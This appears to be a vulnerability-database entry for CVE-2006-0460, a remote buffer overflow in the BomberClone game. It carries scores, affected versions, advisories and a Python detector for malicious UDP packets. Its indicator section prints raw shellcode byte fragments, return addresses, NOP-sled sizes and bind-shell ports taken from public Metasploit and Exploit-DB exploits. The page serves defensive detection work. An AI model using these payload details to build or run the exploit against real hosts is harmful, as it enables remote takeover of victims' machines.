CVE-2006-0460
Published 2006-02-17
CVE-2006-0460: Multiple buffer overflows in BomberClone before 0.11.6.2 allow remote attackers to execute arbitrary code via long error messages.
Priority P3 · 50 · high · 7.5 · CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 67.75% (99.2th percentile)
Affected
23 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bomberclone | bomberclone | — | — |
| bomberclone | bomberclone | >= 0 < 0.11.6.2-1 | 0.11.6.2-1 |
| debian | bomberclone | < bomberclone 0.11.6.2-1 (bookworm) | bomberclone 0.11.6.2-1 (bookworm) |
Detection & IOCs (extracted from sources)
bytes: \x00\x00\x00\x00\x38\x03\x41
bytes: \x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80
bytes: \x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x36
- Detect oversized UDP packets to port 11000 beginning with the magic header bytes \x00\x00\x00\x00\x38\x03\x41 followed by a large NOP sled, which is characteristic of the BomberClone exploit.
- The exploit sends a malformed pkg_error packet (type=0x00, flags=0x00) over UDP with a text field of 816 bytes padded with 0x90 NOP bytes; monitor for anomalously large UDP datagrams to the BomberClone game port (default 11000).
- The Metasploit module uses a payload space of only 344 bytes with the null byte as a bad character; a 421-byte NOP sled is prepended before the payload, so look for UDP payloads with long NOP sleds on port 11000.
- The exploit overwrites the return address with lstrcpyA (ret-into-libc style); on Windows hosts running BomberClone, alert on unexpected lstrcpyA return-address values (0x7c80c729, 0x77e85f08, 0x77e95e8b) appearing in stack frames.
- Post-exploitation: watch for unexpected listening shells on TCP ports 31337 (Linux) or 4444 (Windows) spawned by the BomberClone process after receiving a malformed error packet.
- The Metasploit shellcode only executes when the victim attempts to close BomberClone, not immediately upon receipt of the exploit packet, so detection based solely on immediate post-exploitation activity may miss the trigger window.
- The return addresses for the ret-into-libc technique are OS/SP-specific (XP SP2 Italian, Win2000 SP1 English variants); detections relying on specific RET values will not cover all target configurations.
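The network-side checks listed above, combined into one payload classifier. This is an added example, not code from any of the indexed sources: the function names, the two thresholds and the rule that an alert needs the header plus one more signal are assumptions, and both sample datagrams are constructed.

```python
"""Flag UDP payloads on the BomberClone port that match the pattern above."""

GAME_PORT = 11000                        # default game port named on the page
MAGIC = b"\x00\x00\x00\x00\x38\x03\x41"  # header bytes named on the page
MIN_SUSPICIOUS_LEN = 512                 # ASSUMPTION: cutoff for "oversized"
MIN_NOP_RUN = 64                         # ASSUMPTION: shortest 0x90 run worth flagging


def longest_run(data, value):
    """Length of the longest run of consecutive bytes equal to `value`."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == value else 0
        best = max(best, cur)
    return best


def inspect_datagram(dst_port, payload):
    """Return the list of matched indicators (empty list: nothing matched)."""
    if dst_port != GAME_PORT:
        return []
    reasons = []
    if payload.startswith(MAGIC):
        reasons.append("magic-header")
    if len(payload) >= MIN_SUSPICIOUS_LEN:
        reasons.append("oversized")
    run = longest_run(payload, 0x90)
    if run >= MIN_NOP_RUN:
        reasons.append("nop-run:%d" % run)
    return reasons


def is_alert(dst_port, payload):
    """ASSUMPTION: alert only on header plus size or sled, to limit false positives."""
    reasons = inspect_datagram(dst_port, payload)
    return "magic-header" in reasons and len(reasons) >= 2


# Constructed samples: a short packet with the header, and the header followed
# by an 816-byte field of 0x90 padding (field length as described on the page).
BENIGN = MAGIC + b"short error text\x00"
SUSPECT = MAGIC + b"\x90" * 816

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, is_alert(GAME_PORT, pkt), inspect_datagram(GAME_PORT, pkt))
```

Because the shellcode reportedly runs only when the game is closed, a payload match like this fires at delivery time and does not depend on seeing a listener appear afterwards.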
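CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| osv | — | 7.5 | HIGH | — |
| vendor_debian | — | 7.5 | HIGH | — |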
Debian
CVE-2006-0460: bomberclone - Multiple buffer overflows in BomberClone before 0.11.6.2 allow remote attackers ...
vendor_debian·2006·CVSS 7.5
Multiple buffer overflows in BomberClone before 0.11.6.2 allow remote attackers to execute arbitrary code via long error messages.
Scope: local
bookworm: resolved (fixed in 0.11.6.2-1)
bullseye: resolved (fixed in 0.11.6.2-1)
forky: resolved (fixed in 0.11.6.2-1)
sid: resolved (fixed in 0.11.6.2-1)
trixie: resolved (fixed in 0.11.6.2-1)
GHSA
GHSA-mcg7-6fhr-xjpc: Multiple buffer overflows in BomberClone before 0
ghsa_unreviewed·2022-05-01
Multiple buffer overflows in BomberClone before 0.11.6.2 allow remote attackers to execute arbitrary code via long error messages.
OSV
CVE-2006-0460: Multiple buffer overflows in BomberClone before 0
osv·2006-02-17·CVSS 7.5
Multiple buffer overflows in BomberClone before 0.11.6.2 allow remote attackers to execute arbitrary code via long error messages.
No detection rules found.
Exploit-DB
BomberClone 0.11.6 - Remote Buffer Overflow (Metasploit)
exploitdb·2010-04-30
---
##
# $Id: bomberclone_overflow.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Bomberclone 0.11.6 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows.
The return address is overwritten with lstrcpyA memory address,
the second and third value are the destination buffer,
the fourth value is the source address of our buffer in the stack.
This exploit is like a return in libc.
ATTEN
Exploit-DB
BomberClone < 0.11.6.2 - Error Messages Remote Buffer Overflow
exploitdb·2006-03-22·CVSS 7.5
/* fork() + bind() port 31337 - ty izik */
/* bind shell to 4444 - metasploit */
Metasploit
Bomberclone 0.11.6 Buffer Overflow
metasploit
This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows. The return address is overwritten with lstrcpyA memory address, the second and third value are the destination buffer, the fourth value is the source address of our buffer in the stack. This exploit is like a return in libc. ATTENTION The shellcode is exec ONLY when someone try to close bomberclone.
No writeups or analysis indexed.
- http://secunia.com/advisories/18914
- http://secunia.com/advisories/18915
- http://secunia.com/advisories/19210
- http://www.debian.org/security/2006/dsa-997
- http://www.gentoo.org/security/en/glsa/glsa-200602-09.xml
- http://www.osvdb.org/23263
- http://www.securityfocus.com/bid/16697
- http://www.vupen.com/english/advisories/2006/0643
- https://exchange.xforce.ibmcloud.com/vulnerabilities/24764
Published: 2006-02-17